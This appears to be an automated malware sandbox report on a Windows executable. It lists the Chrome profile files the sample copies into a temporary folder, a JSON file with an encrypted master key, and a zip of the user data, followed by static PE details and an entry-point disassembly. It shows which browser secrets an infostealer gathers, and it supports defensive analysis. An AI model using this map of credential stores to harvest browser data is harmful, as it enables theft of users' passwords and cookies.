            SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases\Databases.db

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):28672
            Entropy (8bit):0.3410017321959524
            Encrypted:false
            SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
            MD5:98643AF1CA5C0FE03CE8C687189CE56B
            SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
            SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
            SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\heavy_ad_intervention_opt_out.db

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):0.35226517389931394
            Encrypted:false
            SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
            MD5:D2CCDC36225684AAE8FA563AFEDB14E7
            SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
            SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
            SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\000003.log

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):3488
            Entropy (8bit):6.430472819920139
            Encrypted:false
            SSDEEP:96:v0bQZIYjIYmzGbDMYjMYWYcYK3vxOT3bT3jT36:eQZIIIbzGbDMIM3YcYRfP+
            MD5:ADAB988EF3DE1E7E37633562E9A67278
            SHA1:4101364727ED70FCD4707A4D6ACCC9A14C549053
            SHA-256:5DF063E2BD61EC84425188DEA234C2DDB4A250AE5AEF8214D300221B4D5BCBA0
            SHA-512:0E43181CC0517EB495709558696BAAA2D99E6E4BBB193715DFE61951BC5C350EAD81063177CEEDC6CA0FD9A1E5C29B604B5B17B7E90DEF1BB7208815D0983669
            Malicious:false
            Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f....................................4_IPH_BatterySaverMode...IPH_BatterySaverMode......4_IPH_CompanionSidePanel...IPH_CompanionSidePanel.....$4_IPH_CompanionSidePanelRegionSearch(."IPH_CompanionSidePanelRegionSearch......4_IPH_DesktopCustomizeChrome ..IPH_DesktopCustomizeChrome......4_IPH_DownloadToolbarButton...IPH_DownloadToolbarButton.....&4_IPH_FocusHelpBubbleScreenReaderPromo*.$IPH_FocusHelpBubbleScreenReaderPromo......4_IPH_GMCCastStartStop...IPH_GMCCastStartStop......4_IPH_HighEfficiencyMode...IPH_HighEfficiencyMode......4_IPH_LiveCaption...IPH_LiveCaption......4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage.....(4_IPH_PasswordsManagementBubbleAfterSave,.&IPH_PasswordsManagementBubbleAfterSave.....+4_IPH_PasswordsManagementBubbleDuringSignin/.)IPH_PasswordsManagementBubbleDuringSignin....."4_IPH_PasswordsWebAppProfileSwitch&. IPH_PasswordsWebAppProfileSwitch......4_IPH_PerformanceNewBadge...IPH_Perform

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\CURRENT

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.2743974703476995
            Encrypted:false
            SSDEEP:3:1sjgWIV//Uv:1qIFUv
            MD5:46295CAC801E5D4857D09837238A6394
            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
            Malicious:false
            Preview:MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\LOG

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):328
            Entropy (8bit):5.2407192146684825
            Encrypted:false
            SSDEEP:6:kuAQ+q2PcNwi23iKKdKfrK+IFUtjAgZmwxAQVkwOcNwi23iKKdKfrUeLJ:kuAVvLZ5Kk23FUtjAg/xAI54Z5Kk3J
            MD5:044108F32B73F3B5F774E17B3A0A1DB4
            SHA1:316621DC7E8172C7D73A90B92F3F74220A26B21F
            SHA-256:4573FA85F8CF6FA63F86037537A660BCF6EC160363DD6248DDA09AF623437852
            SHA-512:11840868CCFAE5D37B696FA714054FBFE44FF694BD67BD717861C723801EAA95298728B5196539EF9C65D43E0C92BEC715DD1BFCBF6ACB9D0E579A711A221D78
            Malicious:false
            Preview:2023/10/05-08:51:52.909 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2023/10/05-08:51:52.909 1d48 Recovering log #3.2023/10/05-08:51:52.909 1d48 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\LOG.old

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):328
            Entropy (8bit):5.265220803491113
            Encrypted:false
            SSDEEP:6:kusiF4Iq2PcNwi23iKKdKfrK+IFUtjsiF4ZZmwxsbekwOcNwi23iKKdKfrUeLJ:kuxF4IvLZ5Kk23FUtjxF4Z/xWe54Z5Kc
            MD5:FE98B5F272AFF6D1298AEAC70DA2C394
            SHA1:8BD2BC6B37EAF1F33D369DB6FA4EF54FD63F9381
            SHA-256:E9D3170BFA2BE3247796F06E7FBF093BAECF3787EECB463F9C8B1F9D808AAD08
            SHA-512:A9650E17D67FFDC04C69E0E9F382CE7AB133543D035A018EF967E21FD027266FD6021A45E7A6B5A47E68BF10F78E05C5B340DA4A060E6E8A67A4E6E41EBE266F
            Malicious:false
            Preview:2023/10/05-08:51:49.496 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2023/10/05-08:51:49.496 1e30 Recovering log #3.2023/10/05-08:51:49.497 1e30 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\MANIFEST-000001

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Secret Key
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.704993772857998
            Encrypted:false
            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
            Malicious:false
            Preview:.|.."....leveldb.BytewiseComparator......

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\000003.log

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):1117
            Entropy (8bit):4.117374471371382
            Encrypted:false
            SSDEEP:24:G0nYgWK6oMlxN0PrxvhC+lvBl58l8Qzmmp0CzVZ2bVHoxwqs:LYg9gN4xvxdB7QzmE0a/2bVHoxwqs
            MD5:C67C6EF98AF2795CF8CE93AF3A6AD2C1
            SHA1:5412605A5AF8AF4C61A20D809F64ADEA71BB2796
            SHA-256:BCDE91E45F89D90148246B6070C02A08DC505A8D92183408A5AF4EA2DAC64E3E
            SHA-512:0FB1EE069D707674AFDDE33E2A2199C8F81EFF26EB56B34E21310DC05C9096ECA1B1E58294E32687B91434E109F3AC754A516D29F9C7263F05955274253A7734
            Malicious:false
            Preview:.h.6.................__global... .t...................__global... ...w.................44_.....B....................33_.........................44_......'..................33_.......fA.................41_.....s....................41_......u...................__global... ..92..................__global... ..&vB.................20_.......pp.................19_........].................20_.....Owa..................20_.....`..N.................19_..........................37_.....9 '<.................38_........J.................39_.......?..................3_......-...................18_......|...................4_......@o..................37_.....<[..................21_...../L...................21_.....1.Q.................38_.......4..................3_..........................39_......[...................18_.....L.(t.................4_......U..................9_..........................9_.....D.^.... .............__global... .......!.............__global... .nb...."...........

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\CURRENT

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.2743974703476995
            Encrypted:false
            SSDEEP:3:1sjgWIV//Uv:1qIFUv
            MD5:46295CAC801E5D4857D09837238A6394
            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
            Malicious:false
            Preview:MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\LOG

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):346
            Entropy (8bit):5.232025543082696
            Encrypted:false
            SSDEEP:6:kuACt+q2PcNwi23iKKdKfrzAdIFUtjAC5ZmwxACtVkwOcNwi23iKKdKfrzILJ:kuAbvLZ5Kk9FUtjA+/xAy54Z5Kk2J
            MD5:FB0EB693CD02D005CEFCAB70D2EC5C5B
            SHA1:C3BD59444C316816F97E9858BB8E3E3AC26AA42C
            SHA-256:96EFF6ED3E9A38FE7C6388BB5ED589DAB18D49DF6FB584C014E696893809FFC1
            SHA-512:8FC93DBB974C93C1BF33E14CAF9E6E07267E4638D3EE2F073E1636D5236EBC9A09A3C7273E1028208D9A53DE3FB1BF9DB58738AEBAFE0EFDCB335DB14253FDEA
            Malicious:false
            Preview:2023/10/05-08:51:52.907 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2023/10/05-08:51:52.907 1d48 Recovering log #3.2023/10/05-08:51:52.907 1d48 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\LOG.old

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):346
            Entropy (8bit):5.208625739470281
            Encrypted:false
            SSDEEP:6:kusgF4Iq2PcNwi23iKKdKfrzAdIFUtjscXZmwxscFkwOcNwi23iKKdKfrzILJ:kuCIvLZ5Kk9FUtjx/xr54Z5Kk2J
            MD5:63A82D7441EDC38BD95D1B07443D98C4
            SHA1:9E90DD1DDB04B7E464A55BE57943F60AFA463C97
            SHA-256:A25FB4D420CE68B6546507101FA307B2B12147CF9891407B1FA5A083FB3FD15B
            SHA-512:6F790DE0CADF1C05328A9876F281282440346A1E3A7B808C7314891FA49A3EF6550C49AF50918EE07AFDD6A35560F8A9B5EFB5AB2F7EA59627C9937D86BFD5A0
            Malicious:false
            Preview:2023/10/05-08:51:49.494 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2023/10/05-08:51:49.495 1e30 Recovering log #3.2023/10/05-08:51:49.495 1e30 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\MANIFEST-000001

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Secret Key
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.704993772857998
            Encrypted:false
            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
            Malicious:false
            Preview:.|.."....leveldb.BytewiseComparator......

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\trusted_vault.pb

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):38
            Entropy (8bit):4.023471592049354
            Encrypted:false
            SSDEEP:3:N0DIQVoKy:a8Q+
            MD5:3433CCF3E03FC35B634CD0627833B0AD
            SHA1:789A43382E88905D6EB739ADA3A8BA8C479EDE02
            SHA-256:F7D5893372EDAA08377CB270A99842A9C758B447B7B57C52A7B1158C0C202E6D
            SHA-512:21A29F0EF89FEC310701DCAD191EA4AB670EDC0FC161496F7542F707B5B9CE619EB8B709A52073052B0F705D657E03A45BE7560C80909E92AE7D5939CE688E9C
            Malicious:false
            Preview:..... 2a68348c2ca0c50ad315d43d90f5a986

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Last Browser

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):106
            Entropy (8bit):3.138546519832722
            Encrypted:false
            SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
            MD5:DE9EF0C5BCC012A3A1131988DEE272D8
            SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
            SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
            SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
            Malicious:false
            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Last Version

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):14
            Entropy (8bit):2.9852281360342525
            Encrypted:false
            SSDEEP:3:NYLYdR:auR
            MD5:CFF0A1C786FFD0ED820350C5AE8A9E3A
            SHA1:F1C65FEE9601D6C4451B4C1EE3F165DC83C5211B
            SHA-256:3F203968EAB70F6FCEEBED6DFBA8F57332FE48CC665206F0756AB54F8432BC52
            SHA-512:8612C4A2E2455480212F5B0ABF6F2BE6429C4FE8879D70090DC478CF355453D4B7E219F3E73BF48C1BFD3C73B55F55F5004293AC9D783FED4D0493B43A8F901A
            Malicious:false
            Preview:117.0.5938.134

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Local State

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):66874
            Entropy (8bit):6.046007742131735
            Encrypted:false
            SSDEEP:1536:tbZm1NWMz6BiFMns3TnOOL1l2d0aUjV4v:BMz6BEMny6OL1YF+w
            MD5:304372125457EA54A5E021A3204E4AE4
            SHA1:3D2853EE63792DA0DD4F029D313AD387E4CD23F0
            SHA-256:6A7E77825E16189ADC252F8A7E08EA626498C219128A14B905870B84D7BF3097
            SHA-512:172B21706D4217CE554BFB2E9728FE29CC18F3E64B760EEFAD8EFCF7E22AEE44522C3E06275EB84D92939F478017ED7032225C7CF08352A199B4C08A12CC069E
            Malicious:false
            Preview:{"browser":{"first_run_finished":true,"shortcut_migration_version":"117.0.5938.134"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.696492313360066e+12,"network":1.696492312e+12,"ticks":51162337.0,"uncertainty":1740796.0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAAAPQcnJ37Osrz3LXkc8SNb7+dvmnpKKSyCOEIIndMy9NwAAAAAOgAAAAAIAACAAAAAhxWF/HI4j2N8Uz5danfSW8MdSYLQzwvpLy9AyeXwgoWABAAAxqR3kIyvYmeWbgl9FBFx2veEWAP5nxPFziCuZU+uaPtferF1OnCLBzuvCaT1XMjeky3tb5TNl4qWLS6Tq5UuQsDMppnsmWAWDyILVvybag7KthmsqsvCcPpTUWINRbOhRWpq+zyADhMWPF9rCMM5/uaizSz83MiOP4EFYuTrG5RBYS7hKoxV8KhJgZA8JSghcKcfRD2f8y19t1WpSsQY9iDw7uyhkCNEIjQeMQq9qi4eOCZg5WLdSZprTxO0Fd1psgHC2T8k0f3EaON1+2z4L4kpniR2tXFPYnDtwlO61R2shdQTs/Z/HOAYufyM1htPwTz7e3osVymOyDCFPxTr75a4Dvq

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Variations

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):85
            Entropy (8bit):4.3488360343066725
            Encrypted:false
            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
            MD5:BC6142469CD7DADF107BE9AD87EA4753
            SHA1:72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
            SHA-256:B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
            SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
            Malicious:false
            Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\first_party_sets.db

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 12, cookie 0xa, schema 4, UTF-8, version-valid-for 9
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):0.5167739226498602
            Encrypted:false
            SSDEEP:48:T27/IHRH34kWqB1kQnjhHmr6ITmUNpLz:iDIHRHIbKkQndHmLX
            MD5:24AABC1B53CDAC31DA2BC88CCE92BB22
            SHA1:D05E5F98A64E2F00C36A42FCF65D0C75D932C21D
            SHA-256:5713972D0F6AD6D6BAC6796CDD87672D59EF9EF1933E268A5CCD38CBF98B4FEE
            SHA-512:A409F945D434DD75CF6FFACFBD68F5715C3A0B526A2C03BFB378FFD8B3F0DFA76F74212863320B2833D588E5CF9C259A8EE2C1478537FD3A6344264EE2D9BF60
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.......\..g.................C.\......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\segmentation_platform\ukm_db

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 7, cookie 0x6, schema 4, UTF-8, version-valid-for 6
            Category:dropped
            Size (bytes):28672
            Entropy (8bit):0.35721947592478775
            Encrypted:false
            SSDEEP:24:TLHNrCuoxbGduhr2fk05b53HxOSRtK0J4ApCu:TxC4QB2zbBxx
            MD5:CF7B71E1F446640439290AAD6A36394F
            SHA1:3B9BFB524A8A82980E72DF39872AE77363CC9F85
            SHA-256:3B8B5249AF39D78D22B02D9E0E4DC26266086BBB77CAADBF28F1E38E8944691D
            SHA-512:C1707F678A11F0E3DED6D0634506554AC3E19D82A839991E1EDEE41BC70A0A6164F4AF4DE325B18E2BCB22C6C0CE21F62B6497FC54FCEBF0409FBF986519B84E
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j..................x..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\source_info.json

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):204
            Entropy (8bit):5.445759036821052
            Encrypted:false
            SSDEEP:6:YGwTjSeYmSfDlQC/QC3swpJNWD+vkDbMyJWm4:YGYjSeYmSZHs0JEDJWm4
            MD5:797FBD01F1844E2ACCDB3A2DD389C1EB
            SHA1:1EB3586B6C5BB758E8002E0C4181597314DDAB54
            SHA-256:327E0883155CC78B9CAB8255C0E578B0BEE9A9D2D661D3AC40A6095E6C5CA034
            SHA-512:FB4CFEAD9E5687C17A10BCA1CCCABEC27852E0C08C22C47CE8BDA21A824CF2759C44BDAC60A616B42E869A16098C6928A6735CB94D455817E2E53879623E701A
            Malicious:false
            Preview:{"created_at":1724333975,"encrypted_master_key":"PTjKI4fGzS6O6tUPYCF4HalwOBgP+ovXzdDZniyk/6ex1OVU1BeugRt2yR/dtMx7","source_user_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data"}

            C:\Users\user\AppData\Local\Google\Chrome\user_data.zip

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
            Category:dropped
            Size (bytes):408281
            Entropy (8bit):7.940930594087421
            Encrypted:false
            SSDEEP:12288:sZ/52if8A2z8lQ6GYOvm0MWWnsXUY1N8FRc0:jdA2QnOvHWpwNul
            MD5:4ED247CC207DCC0D61FD0CF12896D59E
            SHA1:B992F0D09C5E138055D8EE78897D58853CE3E584
            SHA-256:03BF56980A4A42FFE927D6B9FA22200195E0CF74BA95EA52CFF7205E237E7182
            SHA-512:EA2E3FF867076945EF00E8651B8A3C924B22B576A9AEED245F55A5811CE3B47B78199A0915B62D993384C8783FD48E26EF7D877EDC35CC9EA00E8C44A9F9CB4A
            Malicious:false
            Preview:PK.........L.Y............+...User Data Temp\Default\Affiliation DatabaseUT....?.f...n.T......eQE.....5.(B.....!"u.i...r.....i....y.^`6..G..l..D.G.gZ.V...'.....u"].'u?V.2..^,?..B...R.!6..9q+#.X..5....._..D6.Z.O._v~.Q.....\.~..,......7.-#oY....~.u.X."?.E.([m..-[./.L.d......V..+M.4Z.9........,.0..7,M...z.]u.X..0.....-.....M#.........v.".. ....p+U.BR....9-.......J.\~c...Y.Qs.M..vZEy.U.....7.Go^^.bwn.YB6...T..3...w,.p.].[..VN..#.(....Z#.0..%mt0..=a...@..j.....7oN/......eG'E-.da.....a.K%.E.n.t..8sw.oF...}r.........5k.,..;.to.....-..L&.Z..~....-...LrW...;. RWC.k/.....$..%.#ue.J..?8....3..~Z.s..?........b..~.f.....vO['..Z......F....T.%.k...-.....w.l^....^w..w.>Z.......n9...!6...m!.n.....o..e........m...Cs.....}/./..}......5}....j..w...Q...T..........}.......[...j.<..s..6....?.{......lp.................................Xu.......X}.........c................V.......PK..aU..I.......PK.........L.Y............3...User Data Temp\Default\Affiliat

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.496946866953553
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.53%
            • InstallShield setup (43055/19) 0.43%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:file.exe
            File size:16'807'936 bytes
            MD5:5470a4ef9f9a778dff7a1376912ddd8f
            SHA1:42ce6e45adbea85a114bc670b8484a853cfa4c63
            SHA256:f06d0f702c63deb3a0a86defa6730b5886522872f8bc6ad565a665c83f76b6ae
            SHA512:5f26b7e7d3fe4fbf034530fefd55154db6e8b4eb5e37f28a28001deff0e22e3381653c6079069594a19190d3097a1612741757456bef0953a61435d351a22bf1
            SSDEEP:98304:WzOkboRQnw5MIdDo4bbCJq4jR81b4er6/H6q2w79/+wrBAgO+2mAKmYs6M:RO3UD5b0R81bXrG92w79meBA9Nmll
            TLSH:49076B51FE8740F6DA03157180ABB36B63385D058B39CB9BFB107E69EC37696287B205
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........|...(............C..,...............P....@.................................%*....@................................

            File Icon

            Icon Hash:aea7b797f24a4a32

            Static PE Info

            General

            Entrypoint:0x46dc80
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:1
            File Version Major:6
            File Version Minor:1
            Subsystem Version Major:6
            Subsystem Version Minor:1
            Import Hash:4f2f006e2ecf7172ad368f8289dc96c1

            Entrypoint Preview

            Instruction
            jmp 00007FE2554966B0h
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            sub esp, 28h
            mov dword ptr [esp+1Ch], ebx
            mov dword ptr [esp+10h], ebp
            mov dword ptr [esp+14h], esi
            mov dword ptr [esp+18h], edi
            mov dword ptr [esp], eax
            mov dword ptr [esp+04h], ecx
            call 00007FE25547A6D6h
            mov eax, dword ptr [esp+08h]
            mov edi, dword ptr [esp+18h]
            mov esi, dword ptr [esp+14h]
            mov ebp, dword ptr [esp+10h]
            mov ebx, dword ptr [esp+1Ch]
            add esp, 28h
            retn 0004h
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            sub esp, 08h
            mov ecx, dword ptr [esp+0Ch]
            mov edx, dword ptr [ecx]
            mov eax, esp
            mov dword ptr [edx+04h], eax
            sub eax, 00010000h
            mov dword ptr [edx], eax
            add eax, 00000BA0h
            mov dword ptr [edx+08h], eax
            mov dword ptr [edx+0Ch], eax
            lea edi, dword ptr [ecx+34h]
            mov dword ptr [edx+18h], ecx
            mov dword ptr [edi], edx
            mov dword ptr [esp+04h], edi
            call 00007FE255498B24h
            cld
            call 00007FE255497B9Eh
            call 00007FE2554967D9h
            add esp, 08h
            ret
            jmp 00007FE2554989D0h
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            mov ebx, dword ptr [esp+04h]
            mov ebp, esp
            mov dword ptr fs:[00000034h], 00000000h
            mov ecx, dword ptr [ebx+04h]
            cmp ecx, 00000000h
            je 00007FE2554989D1h
            mov eax, ecx
            shl eax, 02h
            sub esp, eax
            mov edi, esp
            mov esi, dword ptr [ebx+08h]
            cld
            rep movsd

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xf650000x45e.idata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x102c0000x32810.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf660000x37986.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0xc153000xb8.data
